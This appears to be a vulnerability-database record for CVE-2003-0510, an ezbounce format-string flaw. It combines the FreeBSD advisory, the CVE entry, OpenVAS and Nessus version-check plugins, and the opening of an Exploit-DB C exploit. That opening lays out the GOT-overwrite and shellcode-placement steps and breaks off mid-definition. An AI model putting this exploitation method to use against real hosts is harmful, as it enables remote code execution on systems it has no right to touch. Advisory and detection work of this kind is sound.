ID C480EB5E-7F00-11D8-868E-000347DD607F Type freebsd Reporter FreeBSD Modified 2004-03-29T00:00:00
Description
A security hole exists that can be used to crash the proxy and
execute arbitrary code. An exploit is circulating that takes
advantage of this, and in some cases succeeds in obtaining a login
shell on the machine.
{"id": "C480EB5E-7F00-11D8-868E-000347DD607F", "bulletinFamily": "unix", "title": "ezbounce remote format string vulnerability", "description": "\nA security hole exists that can be used to crash the proxy and\n\t execute arbitrary code. An exploit is circulating that takes\n\t advantage of this, and in some cases succeeds in obtaining a login\n\t shell on the machine.\n", "published": "2003-07-01T00:00:00", "modified": "2004-03-29T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://vuxml.freebsd.org/freebsd/c480eb5e-7f00-11d8-868e-000347dd607f.html", "reporter": "FreeBSD", "references": ["http://ezbounce.dc-team.com/"], "cvelist": ["CVE-2003-0510"], "type": "freebsd", "lastseen": "2019-05-29T18:35:18", "edition": 4, "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2003-0510"]}, {"type": "osvdb", "idList": ["OSVDB:2230"]}, {"type": "nessus", "idList": ["FREEBSD_EZBOUNCE_104_A_1.NASL", "FREEBSD_PKG_C480EB5E7F0011D8868E000347DD607F.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:22848"]}, {"type": "openvas", "idList": ["OPENVAS:52491"]}], "modified": "2019-05-29T18:35:18", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2019-05-29T18:35:18", "rev": 2}, "vulnersScore": 7.2}, "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "ezbounce", "packageVersion": "1.04.a_1"}], "scheme": null}
{"cve": [{"lastseen": "2021-02-02T05:22:09", "description": "Format string vulnerability in ezbounce 1.0 through 1.50 allows remote attackers to execute arbitrary code via the \"sessions\" command.", "edition": 4, "cvss3": {}, "published": "2003-08-07T04:00:00", "title": "CVE-2003-0510", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0510"], "modified": "2016-10-18T02:34:00", "cpe": ["cpe:/a:ezbounce:ezbounce:1.12", "cpe:/a:ezbounce:ezbounce:1.41", "cpe:/a:ezbounce:ezbounce:1.19", "cpe:/a:ezbounce:ezbounce:1.49", "cpe:/a:ezbounce:ezbounce:1.32", "cpe:/a:ezbounce:ezbounce:1.7", "cpe:/a:ezbounce:ezbounce:1.24", "cpe:/a:ezbounce:ezbounce:1.47", "cpe:/a:ezbounce:ezbounce:1.9", "cpe:/a:ezbounce:ezbounce:1.33", "cpe:/a:ezbounce:ezbounce:1.46", "cpe:/a:ezbounce:ezbounce:1.15", "cpe:/a:ezbounce:ezbounce:1.31", "cpe:/a:ezbounce:ezbounce:1.35", "cpe:/a:ezbounce:ezbounce:1.13", "cpe:/a:ezbounce:ezbounce:1.38", "cpe:/a:ezbounce:ezbounce:1.25", "cpe:/a:ezbounce:ezbounce:1.21", "cpe:/a:ezbounce:ezbounce:1.8", "cpe:/a:ezbounce:ezbounce:1.27", "cpe:/a:ezbounce:ezbounce:1.14", "cpe:/a:ezbounce:ezbounce:1.20", "cpe:/a:ezbounce:ezbounce:1.11", "cpe:/a:ezbounce:ezbounce:1.37", "cpe:/a:ezbounce:ezbounce:1.50", "cpe:/a:ezbounce:ezbounce:1.23", "cpe:/a:ezbounce:ezbounce:1.34", "cpe:/a:ezbounce:ezbounce:1.42", "cpe:/a:ezbounce:ezbounce:1.18", "cpe:/a:ezbounce:ezbounce:1.4", "cpe:/a:ezbounce:ezbounce:1.26", "cpe:/a:ezbounce:ezbounce:1.36", "cpe:/a:ezbounce:ezbounce:1.10", "cpe:/a:ezbounce:ezbounce:1.45", "cpe:/a:ezbounce:ezbounce:1.0", "cpe:/a:ezbounce:ezbounce:1.3", "cpe:/a:ezbounce:ezbounce:1.2", "cpe:/a:ezbounce:ezbounce:1.29", "cpe:/a:ezbounce:ezbounce:1.44", "cpe:/a:ezbounce:ezbounce:1.48", "cpe:/a:ezbounce:ezbounce:1.22", "cpe:/a:ezbounce:ezbounce:1.30", "cpe:/a:ezbounce:ezbounce:1.1", "cpe:/a:ezbounce:ezbounce:1.16", "cpe:/a:ezbounce:ezbounce:1.5", "cpe:/a:ezbounce:ezbounce:1.40", "cpe:/a:ezbounce:ezbounce:1.6", "cpe:/a:ezbounce:ezbounce:1.43", "cpe:/a:ezbounce:ezbounce:1.39", "cpe:/a:ezbounce:ezbounce:1.28", "cpe:/a:ezbounce:ezbounce:1.17"], "id": "CVE-2003-0510", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0510", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:ezbounce:ezbounce:1.4:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.43:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.16:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.21:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.10:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.32:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.50:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.7:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.39:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.46:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.45:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.27:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.49:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.40:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.13:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.12:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.34:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.18:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.35:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.48:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.9:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.17:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.8:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.41:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.44:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.38:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.37:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.30:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.23:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.28:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.5:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.42:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.20:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.11:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.22:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.29:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.6:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.14:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.26:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.33:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.19:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.25:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.47:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.36:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.24:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.15:*:*:*:*:*:*:*", "cpe:2.3:a:ezbounce:ezbounce:1.31:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-02T21:10:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0510"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-19T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:52491", "href": "http://plugins.openvas.org/nasl.php?oid=52491", "type": "openvas", "title": "FreeBSD Ports: ezbounce", "sourceData": "#\n#VID c480eb5e-7f00-11d8-868e-000347dd607f\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: ezbounce\n\nCVE-2003-0510\nFormat string vulnerability in ezbounce 1.0 through 1.50 allows remote\nattackers to execute arbitrary code via the 'sessions' command.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://ezbounce.dc-team.com/\nhttp://www.vuxml.org/freebsd/c480eb5e-7f00-11d8-868e-000347dd607f.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(52491);\n script_version(\"$Revision: 4112 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-19 15:17:59 +0200 (Mon, 19 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2003-0510\");\n script_bugtraq_id(8071);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"FreeBSD Ports: ezbounce\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"ezbounce\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.04.a_1\")<0) {\n txt += 'Package ezbounce version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2016-09-26T17:24:39", "edition": 1, "description": "The following package needs to be updated: ezbounce", "published": "2004-07-06T00:00:00", "type": "nessus", "title": "FreeBSD : ezbounce remote format string vulnerability (45)", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0510"], "modified": "2011-10-02T00:00:00", "id": "FREEBSD_EZBOUNCE_104_A_1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=12539", "sourceData": "# @DEPRECATED@\n# \n# This script has been deprecated by freebsd_pkg_c480eb5e7f0011d8868e000347dd607f.nasl.\n#\n# Disabled on 2011/10/01.\n\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# This script contains information extracted from VuXML :\n#\n# Copyright 2003-2006 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n#\n#\n\ninclude('compat.inc');\n\nif ( description )\n{\n script_id(12539);\n script_version(\"$Revision: 1.11 $\");\n script_bugtraq_id(8071);\n script_cve_id(\"CVE-2003-0510\");\n\n script_name(english:\"FreeBSD : ezbounce remote format string vulnerability (45)\");\n\nscript_set_attribute(attribute:'synopsis', value: 'The remote host is missing a security update');\nscript_set_attribute(attribute:'description', value:'The following package needs to be updated: ezbounce');\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:U/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\nscript_set_attribute(attribute:'solution', value: 'Update the package on the remote host');\nscript_set_attribute(attribute: 'see_also', value: 'http://ezbounce.dc-team.com/\nhttp://fedoralegacy.org/updates/RH7.3/2004-10-23-FLSA_2004_1947__Updated_glibc_packages_fix_flaws.html\nhttp://mozillanews.org/?article_date=2004-12-08+06-48-46\nhttp://rhn.redhat.com/errata/RHSA-2004-059.html\nhttp://secunia.com/advisories/13129/\nhttp://secunia.com/advisories/13254/\nhttp://secunia.com/multiple_browsers_window_injection_vulnerability_test/\nhttp://www.debian.org/security/2004/dsa-620\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-09.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-10.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-11.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-12.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-13.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-14.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-15.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-16.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-17.html\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=103638\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=273699');\nscript_set_attribute(attribute:'see_also', value: 'http://www.FreeBSD.org/ports/portaudit/c480eb5e-7f00-11d8-868e-000347dd607f.html');\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/07/06\");\n script_cvs_date(\"$Date: 2011/10/02 01:05:36 $\");\n script_end_attributes();\n script_summary(english:\"Check for ezbounce\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2010 Tenable Network Security, Inc.\");\n family[\"english\"] = \"FreeBSD Local Security Checks\";\n script_family(english:family[\"english\"]);\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/FreeBSD/pkg_info\");\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated. Refer to plugin #37811 (freebsd_pkg_c480eb5e7f0011d8868e000347dd607f.nasl) instead.\");\n\nglobal_var cvss_score;\ncvss_score=7;\ninclude('freebsd_package.inc');\n\n\npkg_test(pkg:\"ezbounce<1.04.a_1\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-01-07T10:49:46", "description": "A security hole exists that can be used to crash the proxy and execute\narbitrary code. An exploit is circulating that takes advantage of\nthis, and in some cases succeeds in obtaining a login shell on the\nmachine.", "edition": 24, "published": "2009-04-23T00:00:00", "title": "FreeBSD : ezbounce remote format string vulnerability (c480eb5e-7f00-11d8-868e-000347dd607f)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0510"], "modified": "2009-04-23T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:ezbounce", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_C480EB5E7F0011D8868E000347DD607F.NASL", "href": "https://www.tenable.com/plugins/nessus/37811", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(37811);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2003-0510\");\n script_bugtraq_id(8071);\n\n script_name(english:\"FreeBSD : ezbounce remote format string vulnerability (c480eb5e-7f00-11d8-868e-000347dd607f)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A security hole exists that can be used to crash the proxy and execute\narbitrary code. An exploit is circulating that takes advantage of\nthis, and in some cases succeeds in obtaining a login shell on the\nmachine.\"\n );\n # http://ezbounce.dc-team.com/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://web.archive.org/web/20040508173608/http://ezbounce.dc-team.com/\"\n );\n # https://vuxml.freebsd.org/freebsd/c480eb5e-7f00-11d8-868e-000347dd607f.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?39fa5007\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:U/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ezbounce\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/03/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"ezbounce<1.04.a_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-02T19:40:59", "description": "ezbounce 1.0/1.5 Format String Vulnerability. CVE-2003-0510. Remote exploit for linux platform", "published": "2003-07-01T00:00:00", "type": "exploitdb", "title": "ezbounce 1.0/1.5 Format String Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0510"], "modified": "2003-07-01T00:00:00", "id": "EDB-ID:22848", "href": "https://www.exploit-db.com/exploits/22848/", "sourceData": "source: http://www.securityfocus.com/bid/8071/info\r\n\r\nIt has been reported that ezbounce is affected by a format string vulnerability. The condition is present in the file \"ezbounce/commands.cpp\" and can be triggered when session support is enabled. To exploit this vulnerability, the attacker must have valid credentials. This flaw may be of use to attackers who have proxy access but no privileges on the underlying host.\r\n\r\n/*[ ezbounce[v1.0+beyond]: remote format string exploit. ]*\r\n * (effects current: v1.04a(stable) --- v1.50-pre6(beta)) *\r\n * *\r\n * by: vade79/v9 v9@fakehalo.deadpig.org (fakehalo) *\r\n * *\r\n * ezbounce homepage/URL: *\r\n * http://druglord.freelsd.org/ezbounce/ *\r\n * *\r\n * requirements to exploit: *\r\n * - valid user/password: any access level. *\r\n * - the user's settings contains \"enable-detach-command\" *\r\n * (should be expected, a main feature of ezbounce) *\r\n * - ability to connect to anything. but, does not *\r\n * disconnect after sending initial irc(USER/NICK) *\r\n * information. this cannot be localhost:bnc_port, *\r\n * it will recognize/abort it. by default uses *\r\n * \"localhost:25\". if no smtpd is running locally, *\r\n * change at will. *\r\n * *\r\n * compile(when using debug, run with 1>file redirect): *\r\n * cc xezb.c -o xezb *\r\n * cc xezb.c -o xezb -DDEBUG *\r\n * *\r\n * the bug itself(from ezbounce/commands.cpp): *\r\n * 1163:CMDFUNC(sessions) *\r\n * ... *\r\n * 1196:char buff[200], timebuff[15]; *\r\n * ... *\r\n * 1204:sprintf(buff,\"%-3d %-20s %-20s %s\\n\", ++idx, *\r\n * c->uinfo.irc->nick, c->uinfo.server, timebuff); *\r\n * 1205:cprintf(buff); *\r\n * *\r\n * cprintf() performs like printf() typically does, don't *\r\n * really know why that was printed to a buffer at all, *\r\n * considering cprintf() supports formats. users can *\r\n * control the c->uinfo.irc->nick buffer without taint *\r\n * checks for anything(%/$), c->uinfo.server can be *\r\n * controlled as well. but, has it to be a real host. *\r\n * \"%-number\" doesn't limit anything. but, the limit for *\r\n * the nickname is set as 32 elsewhere. this is still is *\r\n * too tight. so, i am going to write the address in two *\r\n * detachments. this means i can't use .dtors or it will *\r\n * fail with only writing two of the four bytes. so, i *\r\n * am using sscanf()'s GOT, as it is not used in the *\r\n * process of writing the address, but is used in other *\r\n * functions. *\r\n * *\r\n * as a side note: this could be exploited as a typical *\r\n * buffer overflow as well. but, limited in more ways. *\r\n * since c->uinfo.server is also user controlled, but has *\r\n * to be a legit(able to lookup/idle), you can use a long *\r\n * string of zeros(ie. \"CONN 000000000...\") which becomes *\r\n * 0/localhost to overflow the buffer. the problem then *\r\n * becoming you can only change the address to 0x30's, *\r\n * which would require partial address changes(ie. *\r\n * 0xbfff0030). this would be different if *\r\n * c->uinfo.irc->nick came after c->uinfo.server in the *\r\n * sprintf call. in that case you could use the server *\r\n * as a filler of sorts, then the address(es) to change *\r\n * inside the nickname. but, can't win everything. *\r\n * *\r\n * best way of exploiting the bug: *\r\n * USER x *\r\n * NICK <sscanf GOT addr/2+2>%.0d$hn *\r\n * PASS <user>:<pass> *\r\n * CONN <open host>:<open port, besides bnc port> *\r\n * EZB detach *\r\n * (server will disconnect, then reconnect) *\r\n * USER x *\r\n * NICK <sscanf GOT addr/2>%.0d$hn *\r\n * PASS <user>:<pass> *\r\n * CONN <open host>:<open port, besides bnc port> *\r\n * EZB detach *\r\n * (server will disconnect, then reconnect) *\r\n * USER x *\r\n * NICK x *\r\n * PASS <same user>:<same pass> *\r\n * ECHO <shellcode> (gets placed on top of __mbuffer[]) *\r\n * LOG FIND (uses sscanf()) *\r\n * (when sessions/(automatic on connect) gets called it *\r\n * will change the address in two different cprintf() *\r\n * calls. so, i don't want to change the .dtors or it *\r\n * will only write two bytes. i am using the sscanf() *\r\n * GOT, as it isn't used in the process. but, \"LOG FIND\" *\r\n * uses it) *\r\n **********************************************************/\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <signal.h>\r\n#include <unistd.h>\r\n#include <netdb.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <sys/time.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n/* distance to user supplied data. shouldn't be */\r\n/* too far from 12, if not 12. i didn't add an */\r\n/* automated finder for this exploit. :( */\r\n#define POPS 12\r\n/* gdb /path/to/ezbounce */\r\n/* ... */\r\n/* (gdb) x/i sscanf */\r\n/* 0x8049734 <sscanf>: jmp *0x80637b0 */\r\n/* (use the number after jmp) */\r\n#define SSCANF_GOT_ADDR 0x80637b0\r\n/* ./objdump -x /path/to/ezbounce | grep __mbuffer. */\r\n/* ... */\r\n/* 080646e0 g O .bss 00000400 __mbuffer */\r\n/* 1000(buffer strlen)-226(shellcode strlen)=~750. */\r\n/* it is still possible to have data on top of */\r\n/* __mbuffer[], ahead of the user data, mainly log */\r\n/* relays. with ~750 bytes of nops it shouldn't */\r\n/* be a problem. */\r\n#define RET_ADDR 